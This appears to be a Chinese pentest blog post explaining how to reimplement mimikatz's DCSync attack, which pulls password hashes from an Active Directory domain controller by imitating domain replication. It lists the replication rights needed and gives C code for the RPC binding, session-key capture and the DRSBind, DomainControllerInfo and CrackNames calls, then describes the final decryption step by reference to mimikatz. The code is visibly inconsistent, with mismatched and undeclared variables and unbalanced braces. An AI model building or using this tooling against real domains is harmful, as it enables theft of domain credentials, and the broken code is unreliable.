<!doctype html>
<html lang="en">
    <head>
		
        <meta http-equiv="Content-Type" content="text/html" charset="UTF-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
        <meta name="description" content="venenof7's blog">
        <link rel="shortcut icon" href="/styles/ven.pic.jpg"/>
        <link rel="canonical" href="http://guolinn.com/">
        <link rel="alternate" type="application/rss+xml" title="venenof7" href="">
        <title>浅谈dcsync | venenof7&#39;s blog</title>
        <meta name="description" content="{{meta_description}}">

        <link href="//cdn.bootcss.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet">
        <link rel="stylesheet" type="text/css" href="/styles/crisp.css">
        <meta name="HandheldFriendly" content="True" />
        <meta name="MobileOptimized" content="320" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <!-- HTML5 shim and Respond.js IE8 support of HTML5 elements and media queries -->
        <!--[if lt IE 9]>
        <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
        <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
        <![endif]-->

    <meta name="generator" content="Hexo 6.3.0"></head>
    
		<body class="post-template">
	

        <header id="header">
            <a id="logo" href="/"><img src="/styles/ven.pic.jpg" alt="venenof7's blog" /></a>
            <h1><a href="/">venenof7</a></h1>
            <a href="https://nu1l.com" target="_blank"><p style="color:#5cc2c0">Nu1L Team</p></a>
            <div id="follow-icons">
              </div>
<h6><a href="/about">About</a></h6>
        </header>

        <main id="content">
        <meta name="referrer" content="no-referrer" />


<article class="post">
  一月 13, 2023
  
    <span class="taglist">  &middot; 
    
    
      <a href='/tags/pentest/'>pentest</a> 
    
    </span>
  

  <h1 class="post-title">浅谈dcsync</h1>
  <section class="post-content article-entry">
    <h2 id="2023-x2F-1-x2F-4"><a href="#2023-x2F-1-x2F-4" class="headerlink" title="2023&#x2F;1&#x2F;4"></a>2023&#x2F;1&#x2F;4</h2><p>跟着whoami走了个坑，想着把dcsync单独从mimikatz中摘出来。</p>
<h2 id="什么是dcsync"><a href="#什么是dcsync" class="headerlink" title="什么是dcsync"></a>什么是dcsync</h2><p>DCSync 是一种攻击，它允许模拟域控制器 (DC) 的行为并通过域复制检索密码数据。</p>
<h2 id="需要的acl"><a href="#需要的acl" class="headerlink" title="需要的acl"></a>需要的acl</h2><ul>
<li>DS-Replication-Get-Changes(GUID:1131f6aa-9c07-11d1-f79f-00c04fc2dcd2)</li>
<li>DS-Replication-Get-Changes-All(GUID:1131f6ad-9c07-11d1-f79f-00c04fc2dcd2)</li>
</ul>
<h2 id="大致原理"><a href="#大致原理" class="headerlink" title="大致原理"></a>大致原理</h2><p><a target="_blank" rel="noopener" href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47">目录复制服务 (DRS)</a> 远程协议是一种<a target="_blank" rel="noopener" href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/e5c2026b-f732-4c9d-9d60-b945c0ab54eb#gt_8a7f6700-8311-45bc-af10-82e10accd331">RPC</a> 协议，用于在<a target="_blank" rel="noopener" href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/e5c2026b-f732-4c9d-9d60-b945c0ab54eb#gt_e467d927-17bf-49c9-98d1-96ddf61ddd90">Active Directory中</a><a target="_blank" rel="noopener" href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/e5c2026b-f732-4c9d-9d60-b945c0ab54eb#gt_a5678f3c-cf60-4b89-b835-16d643d1debb">复制</a>和管理数据。<br>该协议由两个名为 drsuapi 和 dsaop 的 RPC 接口组成。每个 drsuapi 方法的名称以“IDL_DRS”开头，而每个 dsaop 方法的名称以“IDL_DSA”开头。<br>使用mimikatz执行dcsync攻击，如果使用etw之类的检测，会发现实际用的api有以下4个：</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line">IDL_DRSBind</span><br><span class="line">创建一个上下文句柄，这是调用本接口中任何其他方法所必需的。</span><br><span class="line">IDL_DRSDomainControllerInfo</span><br><span class="line">获取域guid</span><br><span class="line">IDL_DRSCrackNames</span><br><span class="line">获取用户guid</span><br><span class="line">IDL_DRSGetNCChanges</span><br><span class="line">复制数据</span><br></pre></td></tr></table></figure>
<p>所以利用以上api，便可以实现dcsync功能，在下文，我将简单讲明api直接的调用以便有兴趣的读者自己编写。</p>
<h2 id="0x01-rpc连接"><a href="#0x01-rpc连接" class="headerlink" title="0x01 rpc连接"></a>0x01 rpc连接</h2><p>首先<code>IDL_DRSBind</code>需要一个rpc句柄，而rpc连接主要用到了以下3个api：</p>
<ul>
<li>RpcStringBindingComposeW</li>
<li>RpcBindingFromStringBindingW</li>
<li>RpcBindingSetAuthInfoW</li>
</ul>
<p>具体读者可以参考微软官方文档</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="comment">#include &quot;rpcdce.h&quot;</span></span><br><span class="line"><span class="comment">#define SECURITY_WIN32</span></span><br><span class="line"><span class="comment">#include &lt;Windows.h&gt;</span></span><br><span class="line"><span class="comment">#include &lt;sspi.h&gt;</span></span><br><span class="line">BOOL <span class="title function_ invoke__">CreateRPC</span>(LPCWSTR ObjUuid, LPCWSTR ProtSeq, LPCWSTR NetworkAddr,</span><br><span class="line">LPCWSTR Endpoint, LPCWSTR DomainName, LPCWSTR Duser, LPCWSTR Dpass,</span><br><span class="line">RPC_BINDING_HANDLE* hBinding, <span class="keyword">void</span> (RPC_ENTRY* RpcSecurityCallback)(<span class="keyword">void</span>*))</span><br><span class="line">&#123;</span><br><span class="line">	RPC_STATUS rpcstatus;</span><br><span class="line">	BOOL status = <span class="literal">FALSE</span>;</span><br><span class="line">    unsigned char* StringBinding=<span class="literal">NULL</span>;</span><br><span class="line">    handle_t *hBinding;</span><br><span class="line">	LPWSTR ServerPrincName[MAX_PATH+<span class="number">1</span>];</span><br><span class="line">    DWORD pcSpnLength = MAX_PATH;</span><br><span class="line">    SEC_WINNT_AUTH_IDENTITY Authinfo;</span><br><span class="line">	rpcstatus = <span class="title function_ invoke__">RpcStringBindingCompose</span>(<span class="literal">NULL</span>, (RPC_WSTR) ProtSeq, (RPC_WSTR) NetworkAddr, (RPC_WSTR) Endpoint, <span class="literal">NULL</span>, (RPC_CSTR*)&amp;StringBinding);</span><br><span class="line">	<span class="keyword">if</span>(rpcstatus == RPC_S_OK)</span><br><span class="line">	&#123;</span><br><span class="line">		rpcstatus = <span class="title function_ invoke__">RpcBindingFromStringBinding</span>(StringBinding, &amp;hBinding);</span><br><span class="line">		<span class="keyword">if</span>(rpcstatus == RPC_S_OK)</span><br><span class="line">		&#123;</span><br><span class="line">     		spnstatus = <span class="title function_ invoke__">DsMakeSpn</span>(L<span class="string">&quot;LDAP&quot;</span>, NetworkAddr, <span class="literal">NULL</span>, <span class="number">0</span>, <span class="literal">NULL</span>, &amp;pcSpnLength, ServerPrincName); </span><br><span class="line">        	<span class="keyword">if</span>(spnstatus == ERROR_SUCCESS) &#123; </span><br><span class="line">                <span class="keyword">if</span>(Duser &amp;&amp; Dpass)&#123;</span><br><span class="line">                    AuthId.User = Duser;</span><br><span class="line">                    AuthId.UserLength = <span class="title function_ invoke__">strlen</span>(Duser);</span><br><span class="line">                    AuthId.Domain = DomainName;</span><br><span class="line">                    AuthId.DomainLength = <span class="title function_ invoke__">strlen</span>(DomainName);</span><br><span class="line">                    AuthId.Password = Dpass;</span><br><span class="line">                    AuthId.PasswordLength = <span class="title function_ invoke__">strlen</span>(Dpass);</span><br><span class="line">                    AuthId.Flags = SEC_WINNT_AUTH_IDENTITY_UNICODE;</span><br><span class="line">                    rpcstatus=<span class="title function_ invoke__">RpcBindingSetAuthInfoW</span>(&amp;hBinding,(RPC_WSTR)ServerPrincName, RPC_C_AUTHN_LEVEL_DEFAULT,RPC_C_AUTHN_DEFAULT, &amp;Authinfo, RPC_C_AUTHZ_NAME);</span><br><span class="line">                 &#125; </span><br><span class="line">                <span class="keyword">else</span>&#123;</span><br><span class="line">                    rpcstatus=<span class="title function_ invoke__">RpcBindingSetAuthInfoW</span>(&amp;hBinding,(RPC_WSTR)ServerPrincName, RPC_C_AUTHN_LEVEL_DEFAULT,RPC_C_AUTHN_DEFAULT, <span class="literal">NULL</span>, RPC_C_AUTHZ_NAME);</span><br><span class="line">                &#125;</span><br><span class="line">        	<span class="keyword">if</span>(rpcstatus == RPC_S_OK)&#123;</span><br><span class="line">                <span class="keyword">if</span>(RpcSecurityCallback)&#123;</span><br><span class="line">                    rpcstatus=<span class="title function_ invoke__">RpcBindingSetOption</span>(&amp;hBinding,RPC_C_OPT_SECURITY_CALLBACK, (ULONG_PTR)RpcSecurityCallback);</span><br><span class="line">                    <span class="keyword">if</span>(rpcstatus == RPC_S_OK)&#123;</span><br><span class="line">                    	status = <span class="literal">TRUE</span>;</span><br><span class="line">                    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">                        <span class="title function_ invoke__">wprintf</span>(L<span class="string">&quot;[-] RpcBindingSetOption Error&quot;</span>);</span><br><span class="line">                    &#125;</span><br><span class="line">                status = <span class="literal">TRUE</span>;</span><br><span class="line">            	&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">                    <span class="title function_ invoke__">wprintf</span>(L<span class="string">&quot;[-] rpcBindingSetAuthInfoW Error&quot;</span>);</span><br><span class="line">                &#125;</span><br><span class="line">                </span><br><span class="line">       		&#125;</span><br><span class="line">                status = <span class="literal">TRUE</span>;</span><br><span class="line">        	&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">                <span class="title function_ invoke__">wprintf</span>(L<span class="string">&quot;[-] DsMakeSpn Error&quot;</span>);</span><br><span class="line">            &#125;</span><br><span class="line">            status = <span class="literal">TRUE</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">            <span class="title function_ invoke__">wprintf</span>(L<span class="string">&quot;[-] RpcBindingFromStringBinding Error&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        status = <span class="literal">TRUE</span>;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="title function_ invoke__">wprintf</span>(L<span class="string">&quot;[-] RpcStringBindingCompose Error&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"><span class="keyword">if</span>(!status)&#123;</span><br><span class="line">	rpcstatus = <span class="title function_ invoke__">RpcBindingFree</span>(*hBinding);</span><br><span class="line">	<span class="keyword">if</span>(rpcstatus == RPC_S_OK)&#123;</span><br><span class="line">		*hBinding = <span class="literal">NULL</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="title function_ invoke__">wprintf</span>(L<span class="string">&quot;RpcBindingFree Error&quot;</span>);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">RpcStringFreeW</span>(&amp;StringBinding);</span><br><span class="line"><span class="keyword">return</span> status;</span><br><span class="line">&#125;</span><br><span class="line">    </span><br></pre></td></tr></table></figure>
<p>由于后文用到了session key，所以rpc连接成功后，我们需要利用安全回调函数从客户端获取：</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line">SecPkgContext_SessionKey rpc_drsr_sKey = &#123;<span class="number">0</span>, <span class="literal">NULL</span>&#125;;</span><br><span class="line"><span class="keyword">void</span> RPC_ENTRY <span class="title function_ invoke__">RpcSecurityCallback</span>(<span class="keyword">void</span> *Context)</span><br><span class="line">&#123;</span><br><span class="line">	RPC_STATUS rpcstatus;</span><br><span class="line">	SECURITY_STATUS secstatus;</span><br><span class="line">	PCtxtHandle data = <span class="literal">NULL</span>;</span><br><span class="line"></span><br><span class="line">	rpcStatus = <span class="title function_ invoke__">I_RpcBindingInqSecurityContext</span>(Context, (LPVOID *) &amp;data);</span><br><span class="line">	<span class="keyword">if</span>(rpcstatus == RPC_S_OK)</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="keyword">if</span>(rpc_drsr_sKey.SessionKey)</span><br><span class="line">		&#123;</span><br><span class="line">			<span class="title function_ invoke__">FreeContextBuffer</span>(rpc_drsr_sKey.SessionKey);</span><br><span class="line">			rpc_drsr_sKey.SessionKeyLength = <span class="number">0</span>;</span><br><span class="line">			rpc_drsr_sKey.SessionKey = <span class="literal">NULL</span>;</span><br><span class="line">		&#125;</span><br><span class="line">		secstatus = <span class="title function_ invoke__">QueryContextAttributes</span>(data, SECPKG_ATTR_SESSION_KEY, (LPVOID) &amp;rpc_drsr_sKey);</span><br><span class="line">		<span class="keyword">if</span>(secstatus != SEC_E_OK)&#123;</span><br><span class="line">			<span class="title function_ invoke__">PRINT_ERROR</span>(L<span class="string">&quot;QueryContextAttributes %08x\n&quot;</span>, secstatus);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">else</span> <span class="title function_ invoke__">PRINT_ERROR</span>(L<span class="string">&quot;I_RpcBindingInqSecurityContext %08x\n&quot;</span>, rpcstatus);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>关于回调函数，笔者直接采用了mimikatz的源码，其中<code>I_RpcBindingInqSecurityContext</code>用于获取安全上下文。</p>
<h2 id="0x02-IDL-DRSBind"><a href="#0x02-IDL-DRSBind" class="headerlink" title="0x02 IDL_DRSBind"></a>0x02 <a target="_blank" rel="noopener" href="https://learn.microsoft.com/zh-cn/openspecs/windows_protocols/ms-drsr/1173ca77-049c-40fb-863c-c86ed127ac4e">IDL_DRSBind</a></h2><p>相关结构体以及变量解释可以参考官方文档，<a target="_blank" rel="noopener" href="https://learn.microsoft.com/zh-cn/openspecs/windows_protocols/ms-drsr/1173ca77-049c-40fb-863c-c86ed127ac4e">IDL_DRSBind</a>主要是创建一个上下文句柄，这是调用本接口中任何其他方法所必需的。<br>其中_puuidClientDsa不能为空，设置任意值均可。_</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line">BOOL <span class="title function_ invoke__">D_IDL_DRSBind</span>(RPC_BINDING_HANDLE rpc_handle,DRS_EXTENSIONS_INT* pextClient,DRS_HANDLE* phDrs)&#123;</span><br><span class="line">BOOL status = <span class="literal">FALSE</span>;</span><br><span class="line">ULONG drsstatus;</span><br><span class="line">GUID DRSUAPI_DS_BIND_GUID_Standard	= &#123;<span class="number">0xe24d201a</span>, <span class="number">0x4fd6</span>, <span class="number">0x11d1</span>, &#123;<span class="number">0xa3</span>, <span class="number">0xda</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0xf8</span>, <span class="number">0x75</span>, <span class="number">0xae</span>, <span class="number">0x0d</span>&#125;&#125;;<span class="comment">//只要有就行，不一定非是这个。</span></span><br><span class="line">DRS_EXTENSIONS_INT pextClient=<span class="literal">NULL</span>;</span><br><span class="line">RpcTryExcept &#123;</span><br><span class="line">	<span class="title function_ invoke__">RtlZeroMemory</span>(pextClientInt, <span class="title function_ invoke__">sizeof</span>(DRS_EXTENSIONS_INT));</span><br><span class="line">	pextClient-&gt;cb = <span class="title function_ invoke__">sizeof</span>(DRS_EXTENSIONS_INT) - <span class="number">4</span>;</span><br><span class="line">	pextClient-&gt;dwFlags = DRS_EXT_GETCHGREPLY_V6 | DRS_EXT_STRONG_ENCRYPTION | DRS_EXT_GETCHGREQ_V8;</span><br><span class="line">    drsstatus = <span class="title function_ invoke__">IDL_DRSBind</span>(rpc_handle, &amp;DRSUAPI_DS_BIND_GUID_Standard,</span><br><span class="line">(DRS_EXTENSIONS*)pextClientInt, (DRS_EXTENSIONS**)&amp;pextClient, phDrs);</span><br><span class="line">    <span class="keyword">if</span>(drsstatus==<span class="number">0</span>)&#123;</span><br><span class="line">        status = <span class="literal">TRUE</span>;</span><br><span class="line">    &#125; </span><br><span class="line">&#125;</span><br><span class="line"><span class="title function_ invoke__">RpcExcept</span>(EXCEPTION_EXECUTE_HANDLER)&#123;</span><br><span class="line">    <span class="title function_ invoke__">wprintf</span>(L<span class="string">&quot;RPCException&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line">RpcEndExcept&#123;</span><br><span class="line">    <span class="keyword">return</span> status;</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h2 id="0x03-IDL-DRSDomainControllernfo"><a href="#0x03-IDL-DRSDomainControllernfo" class="headerlink" title="0x03 IDL_DRSDomainControllernfo"></a>0x03 IDL_DRSDomainControllernfo</h2><p>相关结构体以及变量解释可以参考官方文档，其主要是用于获取dc的guid，但实际测试发现该api其实可有可无。</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line">BOOL <span class="title function_ invoke__">D_IDL_DRSDomainControllerInfo</span>(DRS_HANDLE hDrs,DWORD dwInVersion,DRS_MSG_DCINFOREQ* pmsgIn,DWORD* pdwOutVersion,DRS_MSG_DCINFOREPLY* pmsgOut,LPCWSTR Domain,GUID* DomainGUID)&#123;</span><br><span class="line">DRS_HANDLE hDrs = <span class="literal">NULL</span>;</span><br><span class="line">BOOL DomainGUIDfound = <span class="literal">FALSE</span>, ObjectGUIDfound = <span class="literal">FALSE</span>;</span><br><span class="line">BOOL status = <span class="literal">FALSE</span>;</span><br><span class="line">ULONG drsstatus;</span><br><span class="line">DRS_MSG_DCINFOREQ pmsgIn = &#123; <span class="number">0</span> &#125;;</span><br><span class="line">DWORD pdwOutVersion = <span class="number">0</span>;</span><br><span class="line">DRS_MSG_DCINFOREPLY pmsgOut = &#123; <span class="number">0</span> &#125;;</span><br><span class="line">pmsgIn.V1.InfoLevel = <span class="number">2</span>;</span><br><span class="line">pmsgIn.V1.Domain = (LPWSTR) Domain;</span><br><span class="line">RpcTryExcept</span><br><span class="line">&#123;</span><br><span class="line">drsstatus = <span class="title function_ invoke__">IDL_DRSDomainControllerInfo</span>(hrds, &amp;dwInVersion, &amp;pmsgIn,&amp;pdwOutVersion, &amp;dcInfoReply);</span><br><span class="line"><span class="keyword">if</span>(drsstatus == <span class="number">0</span>)&#123;</span><br><span class="line">    <span class="keyword">for</span>(i = <span class="number">0</span>; i &lt; pmsgOut.V2.cItems; i++)&#123;</span><br><span class="line">		<span class="keyword">if</span>(!DomainGUIDfound &amp;&amp; ((<span class="title function_ invoke__">_wcsicmp</span>(ServerName, pmsgOut.V2.rItems[i].DnsHostName) == <span class="number">0</span>) || (<span class="title function_ invoke__">_wcsicmp</span>(Domain, pmsgOut.V2.rItems[i].NetbiosName) == <span class="number">0</span>)))&#123;</span><br><span class="line">            DomainGUIDfound = <span class="literal">TRUE</span>;</span><br><span class="line">            *DomainGUID = pmsgOut.V2.rItems[i].NtdsDsaObjectGuid;<span class="comment">//or ServerObjectGuid</span></span><br><span class="line">            status=<span class="literal">TRUE</span>;</span><br><span class="line">            <span class="comment">//https://learn.microsoft.com/zh-cn/windows/win32/api/ntdsapi/ns-ntdsapi-ds_domain_controller_info_2w</span></span><br><span class="line">        &#125;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="title function_ invoke__">wprintf</span>(L<span class="string">&quot;IDL_DRSDomainControllerInfo Error&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"><span class="title function_ invoke__">RpcExcept</span>(EXCEPTION_EXECUTE_HANDLER)&#123;</span><br><span class="line">    <span class="title function_ invoke__">wprintf</span>(L<span class="string">&quot;RPCException&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line">RpcEndExcept&#123;</span><br><span class="line">    <span class="keyword">return</span> status;</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h2 id="0x04-IDL-DRSCrackNames"><a href="#0x04-IDL-DRSCrackNames" class="headerlink" title="0x04 IDL_DRSCrackNames"></a>0x04 IDL_DRSCrackNames</h2><p>相关结构体以及变量解释可以参考官方文档，其主要是用于获取用户的guid，比如<a target="_blank" rel="noopener" href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/b47debc0-59ee-40e4-ad0f-4bc9f96043b2">DRS_MSG_CRACKREQ_V1</a>及<a target="_blank" rel="noopener" href="https://learn.microsoft.com/en-us/windows/win32/api/ntdsapi/ns-ntdsapi-ds_name_result_itema">DRS_MSG_CRACKREPLY_V1</a></p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line">BOOL <span class="title function_ invoke__">D_IDL_DRSCrackNames</span>(DRS_HANDLE hDrs,DWORD dwInVersion,DRS_MSG_DCINFOREQ* pmsgIn,DWORD* pdwOutVersion,DRS_MSG_DCINFOREPLY* pmsgOut,LPCWSTR Username,GUID* duserguid)&#123;</span><br><span class="line">DRS_HANDLE hDrs = <span class="literal">NULL</span>;</span><br><span class="line">DS_NAME_FORMAT rpsname;</span><br><span class="line">BOOL status = <span class="literal">FALSE</span>;</span><br><span class="line">ULONG drsstatus;</span><br><span class="line">DRS_MSG_CRACKREQ pmsgIn = &#123; <span class="number">0</span> &#125;;</span><br><span class="line">DWORD pdwOutVersion = <span class="number">1</span>;</span><br><span class="line">DRS_MSG_CRACKREPLY pmsgOut = &#123; <span class="number">0</span> &#125;;</span><br><span class="line">UNICODE_STRING userguid;</span><br><span class="line">RpcTryExcept</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="title function_ invoke__">wcsstr</span>(UserName, L<span class="string">&quot;S-1-5-21-&quot;</span>) == UserName)&#123;</span><br><span class="line">        rpsname=DS_SID_OR_SID_HISTORY_NAME;</span><br><span class="line">    &#125;<span class="keyword">else</span> <span class="keyword">if</span> (<span class="title function_ invoke__">wcschr</span>(UserName, L<span class="string">&#x27;\\&#x27;</span>))&#123;</span><br><span class="line">    	rpsname=DS_NT4_ACCOUNT_NAME;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        rpsname=DS_NT4_ACCOUNT_NAME_SANS_DOMAIN;</span><br><span class="line">    &#125;</span><br><span class="line">    pmsgIn.V1.formatOffered=rpsname;</span><br><span class="line">    pmsgIn.V1.formatDesired = DS_UNIQUE_ID_NAME;</span><br><span class="line">    pmsgIn.V1.cNames = <span class="number">1</span>;</span><br><span class="line">	pmsgIn.V1.rpNames = &amp;UserName;</span><br><span class="line">    drsstatus = <span class="title function_ invoke__">IDL_DRSCrackNames</span>(hDrs, <span class="number">1</span>, &amp;pmsgIn,</span><br><span class="line">&amp;pdwOutVersion, &amp;pmsgOut);</span><br><span class="line">	<span class="keyword">if</span> (drsstatus == <span class="number">0</span>)&#123;</span><br><span class="line">        <span class="title function_ invoke__">RtlInitUnicodeString</span>(&amp;userguid,pmsgOut.V1.pResult-&gt;rItems[<span class="number">0</span>].pName);</span><br><span class="line">        <span class="title function_ invoke__">RtlGUIDFromString</span>(&amp;userguid, duserguid);</span><br><span class="line">        status=<span class="literal">TRUE</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">         <span class="title function_ invoke__">wprintf</span>(L<span class="string">&quot;IDL_DRSCrackNames error&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="title function_ invoke__">RpcExcept</span>(EXCEPTION_EXECUTE_HANDLER)&#123;</span><br><span class="line">    <span class="title function_ invoke__">wprintf</span>(L<span class="string">&quot;RPCException&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line">RpcEndExcept&#123;</span><br><span class="line">    <span class="keyword">return</span> status;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h1 id="0x05-IDL-DRSGetNCChanges"><a href="#0x05-IDL-DRSGetNCChanges" class="headerlink" title="0x05 IDL_DRSGetNCChanges"></a>0x05 IDL_DRSGetNCChanges</h1><p>其实这里主要是OID及attrtyp的转换，可以参考<a target="_blank" rel="noopener" href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/6f53317f-2263-48ee-86c1-4580bf97232c">官方文档</a>，笔者这里直接复用了mimikatz相关代码，大致流程如下：<br>首先DRS_MSG_GETCHGREQ结构体相关生成直接利用<code>kull_m_rpc_drsr_MakeAttid</code>，然后域控制器返回的响应消息是一个<code>DRS_MSG_GETCHGREPLY</code>结构体，这里使用的是<code>DRS_MSG_GETCHGREPLY_V6</code>版本，根据结构体的描述，可以知道，相关信息在<code>pObjects</code>属性中，这是一个<code>REPLENTINFLIST</code>结构的表链，在mimikatz中<code>kull_m_rpc_drsr_ProcessGetNCChangesReply</code>对这个链表进行了遍历，最后<a target="_blank" rel="noopener" href="https://learn.microsoft.com/zh-cn/openspecs/windows_protocols/ms-drsr/c7541734-6683-4209-8f61-d0b5171c70c9">kull_m_rpc_drsr_ProcessGetNCChangesReply_decrypt</a>（其实就是文档的反向解密）进行RC4解密。<br>然后继续调用kuhl_m_lsadump_dcsync_descrObject，调用kuhl_m_lsadump_dcsync_descrUser，针对哈希，微软在使用rId对<a target="_blank" rel="noopener" href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-samr/22b79fa8-13bd-4952-a399-9d5a93b2256f">unicodepwd</a>等进行了加密，所以最终会调用kuhl_m_lsadump_dcsync_decrypt，再利用kull_m_string_wprintf_hex打印。<br>当然这个过程中利用 <code>kull_m_rpc_drsr_findMonoAttr</code>、<code>kull_m_rpc_drsr_findAttr</code>、<code>kull_m_rpc_drsr_findAttrNoOID</code>等函数进行了数据结构相关转换读取，具体过程可以参考mimikatz源码，有点复杂…</p>
<h2 id="实现效果："><a href="#实现效果：" class="headerlink" title="实现效果："></a>实现效果：</h2><p><img src="https://cdn.nlark.com/yuque/0/2023/png/21442249/1673600512271-a9e66471-4a46-4623-8208-94a814bfd0f3.png#averageHue=%23270f0a&clientId=ua8c4bc58-2278-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=210&id=uf1abdd5f&margin=%5Bobject%20Object%5D&name=image.png&originHeight=420&originWidth=1664&originalType=binary&ratio=1&rotation=0&showTitle=false&size=107132&status=done&style=none&taskId=u98725939-159d-41fe-92fe-1a3f7cd06c8&title=&width=832" alt="image.png"></p>
<h2 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h2><p>mimikatz的整体源码确实有点复杂，而且其中有的函数完全没有任何官方文档，需要逆向＋猜解才能知道大致用法…钦佩作者</p>

  </section>
  <footer class="post-footer">
    <!--
    <section class="author">
      <h4>venenof7</h4>
      <p></p>
    </section>
    -->
  </footer>
</article>

<nav class="pagination" role="pagination">
    
    <span class="page-number">•</span>
    
    <a class="older-posts" href="/2023/01/01/hi-2023/">
        <!--hi 2023--> next →
    </a>
    
</nav>

        </main>
        <footer id="footer">
            <section id="footer-message">&copy; 2023 venenof7. All rights reserved.</section>
        </footer>
    </body>
</html>


